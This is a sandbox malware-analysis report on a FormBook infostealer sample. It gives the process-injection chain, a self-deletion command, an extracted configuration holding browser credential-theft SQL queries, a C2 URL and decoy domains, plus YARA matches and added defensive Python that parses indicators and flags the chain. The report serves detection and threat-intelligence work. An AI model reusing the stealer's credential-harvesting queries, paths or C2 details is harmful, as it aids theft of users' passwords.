
Analysis Report HOPEFUL.exe

Overview

General Information

Sample Name: HOPEFUL.exe
Analysis ID: 339365
MD5: 9c15af175868121cc014666189d52dae
SHA1: 3ba03f47a8762368538e47806353f55da43d46ac
SHA256: 7c8f873fc34661a785875f76a1f3b1aff6719e69d2a4ea5d2d94f849282b623a
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • HOPEFUL.exe (PID: 6744 cmdline: 'C:\Users\user\Desktop\HOPEFUL.exe' MD5: 9C15AF175868121CC014666189D52DAE)
    • AddInProcess32.exe (PID: 6548 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 4656 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 4240 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
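The process tree above is a typical FormBook chain: the sample drops a copy of a .NET Framework helper (AddInProcess32.exe) into the user's Temp directory, the injected code surfaces in explorer.exe and cmmon32.exe, and finally cmd.exe deletes the dropped file. The following is an added example, not Joe Sandbox or Sigma code, that encodes three checks a detection engineer would run over process-creation telemetry for this chain. EVENTS is constructed from the Startup tree; the report gives no image path for explorer.exe or cmd.exe, so those two paths are assumptions, and the expected directories for AddInProcess32.exe and cmmon32.exe are general Windows knowledge rather than something the report states. Note that the sandbox draws explorer.exe beneath AddInProcess32.exe because of the injection the signatures describe, so real EDR parent/child relationships can differ from this tree.

```python
r"""Process-tree checks for the execution chain shown above.

Added example, not Joe Sandbox or Sigma code.  EVENTS is constructed from
the Startup tree (PID, parent PID, image path, command line).  Image paths
for explorer.exe and cmd.exe are assumptions; the expected directories in
EXPECTED_DIRS are general Windows knowledge, not taken from the report.
"""
import re

EVENTS = [
    {"pid": 6744, "ppid": 0, "image": r"C:\Users\user\Desktop\HOPEFUL.exe",
     "cmdline": r"'C:\Users\user\Desktop\HOPEFUL.exe'"},
    {"pid": 6548, "ppid": 6744, "image": r"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"},
    {"pid": 3388, "ppid": 6548, "image": r"C:\Windows\explorer.exe", "cmdline": ""},  # path assumed
    {"pid": 4656, "ppid": 3388, "image": r"C:\Windows\SysWOW64\cmmon32.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmmon32.exe"},
    {"pid": 4240, "ppid": 4656, "image": r"C:\Windows\SysWOW64\cmd.exe",  # path assumed
     "cmdline": r"/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'"},
    {"pid": 5192, "ppid": 4240, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# Lower-case path prefixes where these Windows binaries normally live.
EXPECTED_DIRS = {
    "addinprocess32.exe": (r"c:\windows\microsoft.net\framework",),
    "cmmon32.exe": (r"c:\windows\system32", r"c:\windows\syswow64"),
}
TEMP_MARKER = "\\appdata\\local\\temp\\"
DEL_RE = re.compile(r"^\s*/c\s+del\s+(.+?)\s*$", re.IGNORECASE)


def ancestors(events, pid):
    """Yield the parent chain of pid, nearest parent first."""
    by_pid = {e["pid"]: e for e in events}
    e = by_pid.get(pid)
    while e and e["ppid"] in by_pid:
        e = by_pid[e["ppid"]]
        yield e


def analyse(events):
    """Run three rules over the tree and return (pid, rule) findings."""
    findings = []
    for e in events:
        image = e["image"].lower()
        name = image.rsplit("\\", 1)[-1]
        # Rule 1: a well-known Windows binary running from the wrong directory.
        if name in EXPECTED_DIRS and not image.startswith(EXPECTED_DIRS[name]):
            findings.append((e["pid"], "known Windows binary outside its expected directory"))
        # Rule 2: anything executed out of the user's Temp directory.
        if TEMP_MARKER in image:
            findings.append((e["pid"], "executable launched from a user Temp directory"))
        # Rule 3: cmd.exe /c del <path> where <path> is the image of an ancestor
        # (the dropper cleaning up after itself, as in the tree above).
        m = DEL_RE.match(e["cmdline"]) if name == "cmd.exe" else None
        if m:
            target = m.group(1).strip("'\"").lower()
            if any(a["image"].lower() == target for a in ancestors(events, e["pid"])):
                findings.append((e["pid"], "cmd.exe deletes the image of an ancestor process"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyse(EVENTS):
        print(f"PID {pid}: {rule}")
```

Rule 3 is the most specific of the three: a `del` whose target equals an ancestor's image path is rare in legitimate software, whereas Temp-directory execution on its own is noisy and belongs in a scoring model rather than an alert.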

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", 
"0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", 
"encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", 
"eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}
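The extractor output above is a flat list: header fields with offsets, then three sections (function hashes, decrypted strings, CnC URL) separated by dashed lines, with the 64 domains fenced by the markers f-start and f-end. The following is an added example, not Joe Sandbox or FormBook code, that parses that layout into usable IOCs and then answers the question an analyst asks first: of the hosts contacted in the Networking section below, which one is the configured C2 and which only appear in the embedded domain list? CONFIG_ITEMS is an excerpt of the "Config: " array above (header fields, three of the hashes and a few decrypted strings are kept; the full 64-entry domain list and the CnC URL are verbatim). Stripping a leading "www." before matching against the embedded list is an assumption based on the memory strings elsewhere in this report (http://www.<domain>/jqc/).

```python
"""Parse the FormBook configuration dump above into usable IOCs.

Added example, not Joe Sandbox or FormBook code.  CONFIG_ITEMS is an excerpt
of the "Config: " array shown above; the 64 domains and the CnC URL are
reproduced verbatim.  Removing a "www." prefix before matching is an
assumption drawn from the memory strings elsewhere in the report.
"""
import re

SEP = "-" * 50  # separator line used by the extractor output

CONFIG_ITEMS = [
    "CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7",
    "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern",
    "strings_offset 0x1c1a3", "searching hashes pattern",
    SEP, "Decrypted Function Hashes", SEP,
    "0x1004744a", "0xf43668a6", "0x980476e5",  # excerpt of the hash list
    SEP, "Decrypted Strings", SEP,
    "USERNAME", "\\Run", "SeDebugPrivilege", "config.php", "POST ",
    "User-Agent: Mozilla Firefox/4.0", "dat=",  # excerpt of the strings
    "f-start",
    "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com",
    "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online",
    "definity.finance", "weddingmustgoon.com", "ludisenofloral.com",
    "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com",
    "internetmarkaching.com", "solidconstruct.site", "ip-freight.com",
    "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net",
    "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com",
    "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com",
    "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site",
    "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com",
    "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com",
    "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store",
    "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com",
    "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com",
    "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com",
    "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com",
    "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com",
    "kathymusic.com", "quintred.com", "mad54.art", "simplification.business",
    "f-end",
    SEP, "Decrypted CnC URL", SEP,
    "www.registeredagentfirm.com/jqc/\x00",  # the JSON "\u0000" decoded
]

# Host headers seen in this run, taken from the Networking section of the report.
OBSERVED_HOSTS = ["www.the343radio.com", "www.registeredagentfirm.com",
                  "www.tiendazoom.com"]

FIELD_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_ ]*?)\s*:?\s*(0x[0-9a-fA-F]+|\d+)$")


def parse_formbook_config(items):
    """Turn the flat extractor output into fields, hashes, domains and C2."""
    seps = [i for i, s in enumerate(items) if s == SEP]
    fields = {}
    for item in items[:seps[0]]:  # "NAME value" lines before the first separator
        m = FIELD_RE.match(item)
        if m:
            fields[m.group(1).strip()] = int(m.group(2), 0)
    # Each section is laid out as SEP, title, SEP, content..., so separators pair up.
    sections = {}
    for k in range(0, len(seps), 2):
        title = items[seps[k] + 1]
        end = seps[k + 2] if k + 2 < len(seps) else len(items)
        sections[title] = items[seps[k + 1] + 1:end]
    strings = sections["Decrypted Strings"]
    domains = strings[strings.index("f-start") + 1:strings.index("f-end")]
    c2 = sections["Decrypted CnC URL"][0].rstrip("\x00")
    host, _, path = c2.partition("/")
    return {
        "fields": fields,
        "function_hashes": [int(h, 16) for h in sections["Decrypted Function Hashes"]],
        "domains": domains,
        "c2_host": host,
        "c2_path": "/" + path,
    }


def classify_hosts(cfg, hosts):
    """Label each contacted host by its role in the extracted configuration."""
    embedded = set(cfg["domains"])
    roles = {}
    for host in hosts:
        bare = host[4:] if host.startswith("www.") else host
        if host == cfg["c2_host"]:
            roles[host] = "configured C2"
        elif bare in embedded:
            roles[host] = "embedded domain list"
        else:
            roles[host] = "not in config"
    return roles


if __name__ == "__main__":
    cfg = parse_formbook_config(CONFIG_ITEMS)
    print(f"C2: {cfg['c2_host']}{cfg['c2_path']}  ({len(cfg['domains'])} embedded domains)")
    for host, role in classify_hosts(cfg, OBSERVED_HOSTS).items():
        print(f"{host:35s} {role}")
```

Only www.registeredagentfirm.com is the configured C2; www.the343radio.com and www.tiendazoom.com come from the embedded list, so blocking just the hosts seen in one sandbox run would miss the 62 other domains FormBook can rotate through. The full list, not the observed hosts, is the IOC set to export.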

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump matches not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 5.2.AddInProcess32.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE match not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 5.2.AddInProcess32.exe.400000.0.unpack; Malware Configuration Extractor: FormBook (the full configuration is reproduced under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: HOPEFUL.exe; ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match; File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: HOPEFUL.exe; Joe Sandbox ML: detected
Source: 5.2.AddInProcess32.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: HOPEFUL.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HOPEFUL.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: AddInProcess32.pdb; source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: cmmon32.pdb; source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL; source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: AddInProcess32.exe, cmmon32.exe
Source: Binary string: AddInProcess32.pdbpw; source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdb; source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\HOPEFUL.exe; Code function: 4x nop then jmp 0164F5EEh (0_2_0164EE1A)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 4x nop then pop edi (5_2_00416BF3)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 4x nop then pop edi (5_2_00416C07)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 4x nop then pop edi (5_2_00416C27)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 4x nop then pop edi (5_2_00416C3F)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 4x nop then pop edi (5_2_00417D68)
Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 4x nop then pop edi (19_2_00ED6BF3)
Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 4x nop then pop edi (19_2_00ED6C27)
Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 4x nop then pop edi (19_2_00ED6C3F)
Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 4x nop then pop edi (19_2_00ED6C07)
Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 4x nop then pop edi (19_2_00ED7D68)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
